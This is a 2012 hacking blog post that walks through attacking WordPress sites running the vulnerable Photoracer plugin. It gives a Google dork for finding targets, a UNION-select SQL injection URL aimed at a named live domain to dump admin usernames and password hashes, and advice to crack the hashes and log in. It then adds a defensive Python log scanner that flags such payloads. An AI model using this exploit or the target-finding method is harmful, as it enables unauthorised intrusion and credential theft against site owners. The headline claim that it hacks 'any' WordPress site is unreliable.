
Thursday, 12 January 2012

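Simplest way to hack any WordPress-based site

In this post I'll tell you the simplest way to hack any WordPress-based site. The method is a SQL injection through the id parameter of the Photoracer plugin's viewimg.php, so it works only on sites running a vulnerable copy of that plugin.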



First we'll use this dork to search for websites with the help of Google:

inurl:"wp-content/plugins/photoracer/viewimg.php?id="


Results: 


I'm now going to test one of them, for example:

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2 

Now add the exploit:

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
This is the exploit (given above).

And now the site address will become:

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


Now you can see the admin and pass. Just crack the hashes and you're done.

Site admin login page for WP:
http://www.SITE-ADDRESS/wp-login.php
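
Seen from the server side, the request shown above stands out in an access log because a legitimate id value for viewimg.php is a plain integer. The following is an added example, not part of the original post or the plugin's code: it scans access-log lines for requests to that script whose id is not numeric. The combined log format, the function names and the sample lines (constructed, using documentation IP ranges) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path of the plugin script named in the post.
TARGET = "/wp-content/plugins/photoracer/viewimg.php"
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
UNION = re.compile(r"union(?:\s|/\*.*?\*/)+(?:all\s+)?select", re.I | re.S)

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Jan/2012:10:00:01 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=2 HTTP/1.1" 200 5120
198.51.100.7 - - [12/Jan/2012:10:02:13 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users-- HTTP/1.1" 200 5344
198.51.100.7 - - [12/Jan/2012:10:02:40 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1%20UNION/**/SELECT%201,2 HTTP/1.1" 500 310
192.0.2.44 - - [12/Jan/2012:10:03:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2210
"""

def classify(line):
    """Return (client, status, verdict) for requests to the plugin script, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    url = urlsplit(target)
    if not url.path.lower().endswith(TARGET):
        return None
    # parse_qs decodes %XX and '+', so encoded payloads are inspected in clear form.
    value = parse_qs(url.query, keep_blank_values=True).get("id", [""])[0]
    if value.isascii() and value.isdigit():
        return client, status, "ok"
    if UNION.search(value):
        return client, status, "union-select"
    return client, status, "non-numeric-id"

def scan(log_text):
    """Return every request to the script whose id is not a plain integer."""
    results = (classify(line) for line in log_text.splitlines())
    return [r for r in results if r and r[2] != "ok"]

if __name__ == "__main__":
    for client, status, verdict in scan(SAMPLE_LOG):
        print(f"{client} status={status} {verdict}")
```

A 200 response to a flagged request is the case to investigate first, since it suggests the query ran and wp_users data may have been returned.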
 
Convex Coders © 2011 Convex-Coders. Supported by Code 104 and tech PANELS